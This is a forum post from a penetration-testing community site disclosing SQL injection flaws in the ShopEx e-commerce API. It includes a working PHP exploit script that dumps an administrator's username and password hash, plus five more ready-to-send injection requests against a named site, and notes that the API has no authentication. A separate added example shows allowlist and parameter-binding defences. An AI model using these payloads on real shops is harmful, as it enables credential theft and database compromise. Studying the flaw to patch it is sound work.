China Network Penetration Testing Alliance (中国网络渗透测试联盟)

Title: Analysis of an API injection vulnerability in the latest ShopEx, with exploit

Author: admin    Time: 2013-7-27 18:34

Vulnerable files: \core\api\payment\2.0\api_b2b_2_0_payment_cfg.php
core\api\payment\1.0\api_b2b_2_0_payment_cfg.php

Line 44: $data['columns'] is not filtered, which leads to SQL injection.
<?php
set_time_limit(0);
ob_flush();
echo 'Test: http://localhost:808' . "\r\n";

// POST body carrying the injected "columns" parameter
$sql = 'columns=* from sdb_payment_cfg WHERE 1 and (select 1 from(select count(*),concat((select (select (SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#&disabled=1';
$url = 'http://localhost:808/api.php?act=search_payment_cfg_list&api_version=2.0';

// send the request and print the response
$ch = curl_init();
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $sql);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
flush();
$data = curl_exec($ch);
echo $data;
curl_close($ch);
?>

One more thing: ShopEx's API module performs no authentication, so any user can access it. An attacker can use it to add, delete and modify product categories, types, specifications, brands and so on, and where filtering is inadequate this also leads to injection.
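As an added example (not ShopEx code; the handler and the column names are hypothetical), this is how a defender would close the gap described above: the "columns" value is accepted only from an allowlist and "disabled" goes through a bound parameter, so a request shaped like the payload in this post is rejected before any SQL is built. The missing API authentication the post mentions is a separate fix in front of this handler.

```php
<?php
// Added example, not ShopEx code: allowlist the user-supplied "columns" value
// instead of interpolating it, and bind the "disabled" value. Column names
// and the handler are hypothetical.

const PAYMENT_CFG_COLUMNS = ['id', 'app_id', 'custom_name', 'disabled'];

// Accept "*" or a comma-separated subset of $allowed. Anything else, including
// spaces, parentheses, quotes or a trailing "#", is rejected rather than escaped.
function safe_columns(string $input, array $allowed): string
{
    $input = trim($input);
    if ($input === '*') {
        return '*';
    }
    $cols = array_map('trim', explode(',', $input));
    foreach ($cols as $c) {
        if (!in_array($c, $allowed, true)) {
            throw new InvalidArgumentException("column not allowed: $c");
        }
    }
    return implode(', ', array_map(fn($c) => "`$c`", $cols));
}

// Build the statement and its bound parameters: identifiers come only from the
// allowlist, values only through placeholders.
function build_query(array $post, array $allowed): array
{
    $columns  = safe_columns($post['columns'] ?? '*', $allowed);
    $disabled = filter_var($post['disabled'] ?? '0', FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0, 'max_range' => 1]]);
    if ($disabled === false) {
        throw new InvalidArgumentException('disabled must be 0 or 1');
    }
    return ["SELECT $columns FROM sdb_payment_cfg WHERE disabled = ?", [$disabled]];
}

// Constructed requests: a benign one and one shaped like the payload in this post.
$requests = [
    ['columns' => 'id,custom_name', 'disabled' => '1'],
    ['columns' => '* from sdb_payment_cfg WHERE 1 and (select 1)#', 'disabled' => '1'],
];
foreach ($requests as $req) {
    try {
        [$sql, $params] = build_query($req, PAYMENT_CFG_COLUMNS);
        echo "OK:       $sql  params=" . json_encode($params) . "\n";
    } catch (InvalidArgumentException $e) {
        echo "REJECTED: {$e->getMessage()}\n";
    }
}
```

The first request builds `SELECT `id`, `custom_name` FROM sdb_payment_cfg WHERE disabled = ?` with `[1]` bound; the second is rejected at the allowlist check and never reaches a query.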
' G) H5 e1 S! l; Y) v- A
Injection 1:
http://www.0day5.com/api.php POST act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)#

Injection 2:
http://www.0day5.com/shopex/api.php act=add_category&api_version=3.1&datas={"name":"name' and 1=x %23"}

Injection 3:
http://www.0day5.com/shopex/api.php act=get_spec_single&api_version=3.1&spec_id=1 xxx

Injection 4:

http://www.0day5.com/shopex/api.php act=online_pay_center&api_version=1.0&order_id=1x&pay_id=1&currency=1

Injection 5:
http://www.0day5.com/shopex/api.php act=search_dly_h_area&return_data=string&columns=xxxxx

Welcome to China Network Penetration Testing Alliance (https://www.cobjon.com/) Powered by Discuz! X3.2